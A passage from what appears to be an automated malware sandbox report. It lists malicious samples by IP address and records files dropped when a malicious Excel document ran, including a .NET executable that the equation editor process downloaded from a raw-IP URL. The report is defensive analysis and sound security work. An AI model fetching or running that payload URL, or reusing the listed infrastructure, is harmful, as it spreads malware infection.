	FORM C1.xlsx	Get hash	malicious	Browse	147.255.162.204
	qXDtb88hht.exe	Get hash	malicious	Browse	23.82.57.32
	6dTTv9IdCw.exe	Get hash	malicious	Browse	147.255.162.204
	wMKDi0Ss3f.exe	Get hash	malicious	Browse	23.82.57.32
	ENrFQVzLHE.exe	Get hash	malicious	Browse	147.255.162.204
	Request For Courtesy Call 7710090112332.xlsx	Get hash	malicious	Browse	23.82.57.32
	xhbUdeAoVP.exe	Get hash	malicious	Browse	147.255.162.204
	bin.exe	Get hash	malicious	Browse	23.82.57.32
	b02c0831_by_Libranalysis.exe	Get hash	malicious	Browse	23.82.57.32
	Contract MAY2021.xlsx	Get hash	malicious	Browse	147.255.162.204
AUTOMATTICUS	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	192.0.78.24
	CyLELjM5zk.exe	Get hash	malicious	Browse	74.114.154.18
	New PO 0006770.exe	Get hash	malicious	Browse	192.0.78.25
	setup_x86_x64_install.exe	Get hash	malicious	Browse	74.114.154.18
	85d8c.exe	Get hash	malicious	Browse	74.114.154.22
	85d8c.exe	Get hash	malicious	Browse	74.114.154.22
	AR2rPMLtaN.exe	Get hash	malicious	Browse	74.114.154.22
	flJrVwWebP.exe	Get hash	malicious	Browse	74.114.154.22
	QfVER41Fwx.exe	Get hash	malicious	Browse	74.114.154.22
	O3h9kRdG7d.exe	Get hash	malicious	Browse	74.114.154.22
	1A263B2603212FF1E492D9E0C718F12601789E27EAABA.exe	Get hash	malicious	Browse	74.114.154.22
	mbVrdKm3zX.exe	Get hash	malicious	Browse	74.114.154.22
	Dpjv8G9gX5.exe	Get hash	malicious	Browse	74.114.154.18
	5qW61eKDTp.exe	Get hash	malicious	Browse	74.114.154.18
	WWzUml7m53.exe	Get hash	malicious	Browse	74.114.154.22
	e7V79qGVJT.exe	Get hash	malicious	Browse	74.114.154.18
	4Dm89IWqe9.exe	Get hash	malicious	Browse	74.114.154.18
	YoKh9rD5xR.exe	Get hash	malicious	Browse	74.114.154.22
	Oyu6AMjXZH.exe	Get hash	malicious	Browse	74.114.154.18
	IsVEKYHPfW.exe	Get hash	malicious	Browse	74.114.154.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1336832
Entropy (8bit):	7.015277955515814
Encrypted:	false
SSDEEP:	24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
MD5:	214B1DDF045E4D6FDD73A5C8788D2ADC
SHA1:	8BB7C462FB649D16EDB98AB526DF8475A329CC71
SHA-256:	D8E25CE44C46057985A0467ADCF4FC12D8BEAC599E3031F6674FD1E01988267E
SHA-512:	781FFF07EDCB65EC4C77C80F20A6C6AA658F4679C411654ABCDC1233F19CEA170B47EBB5A4227618459482F32462AF12188A7CB870BD3EB347696485BB530E3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://13.229.216.142/www/dun.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p.............. ........@.. ....................................@.................................x...O.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............d..............@..B........................H.......L...d8......M....................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r%..p~....o-...(......t$....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D6C62CF.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\214A5B32.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23E59210.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38FE8D8B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54167E84.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6369A9D3.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A346607.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E6ACAD1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\967104B5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96A4929E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B50A5659.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BBA2B1B8.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1183280
Entropy (8bit):	2.09611672026846
Encrypted:	false
SSDEEP:	3072:v34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+D8nG/qc+D:v4UcLe0JOcXuunhqcIhqcE
MD5:	BBE2236B826DC12D03BF8FE425D79AF1
SHA1:	5EF7278C3E84B96E276068CC09A27D0A87E07FD7
SHA-256:	F2CB2541943FAA0400C559BB58650D65CC2BB08024227C78F369EB1263BDFBBF
SHA-512:	3B05B6F4597BD4A560DCC0C93C2A8D01612BB916F819BFDFDB31F186EABC48E2F1B8BC2820FDA2B37F279611D5869F83D34773E1F286573C02E66EB7CE60EB94
Malicious:	false
Preview:	....l...............j...........m>...B.. EMF....0...3...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@..%.......<........... ....N5Y.....................N5Y........ ....y.X........ .........Z..z.X.................................OE.....%...X...%...7...................{$..................C.a.l.i.b.r.i...-.0...d....._`.X..............Z....vdv......%...........%...........%...........!...............................".......................%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....k.......L.......................P... ...6...F...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE9ED886.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
